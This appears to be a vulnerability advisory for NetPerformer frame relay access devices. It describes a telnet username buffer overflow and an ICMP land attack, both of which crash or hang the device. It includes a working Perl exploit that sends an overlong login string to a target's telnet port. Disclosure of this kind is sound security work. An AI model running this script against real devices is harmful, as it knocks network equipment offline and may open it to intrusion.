|
|
| |
| NetPerformer Frame Relay Access Device (FRAD) is "switching & routing device that support Ethernet and SNA protocols, Voice, etc. This device mainly used for connecting distributed WAN network through frame relay or ATM network". Two security vulnerabilities have been discovered in NetPerformer allow remote attackers to cause the server to crash. |
| |
Credit:
The information has been provided by Arif Jatmoko.
|
| |
Vulnerable Systems:
* NetPerformer FRAD ACT SDM-95xx version 7.xx (R1)
* NetPerformer FRAD ACT SDM-93xx version 10.x.x (R2)
* NetPerformer FRAD ACT SDM-92xx version 9.x.x (R1)
1. Telnet long username Buffer Overflow
Passing an overly long username (>4550 char) against telnet service causes device to reboot. Successful remote exploitation will possibly allows an attacker gaining access into the device.
Exploit:
#!/usr/bin/perl
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "23",
Proto => "TCP"))
{
print "Modhiar'000 ..... killing netperformer ... $ARGV[0] port 23...";
sleep(1);
print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
sleep(1);
print $socket "PASS " . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE
2. ICMP Land Attack
By sending specially crafted ICMP packets will causes the device to be hang up and resetting current TCP handshake connection. In earlier version possibly will make device to reboot.
|
|
|
|
|
|
|
|
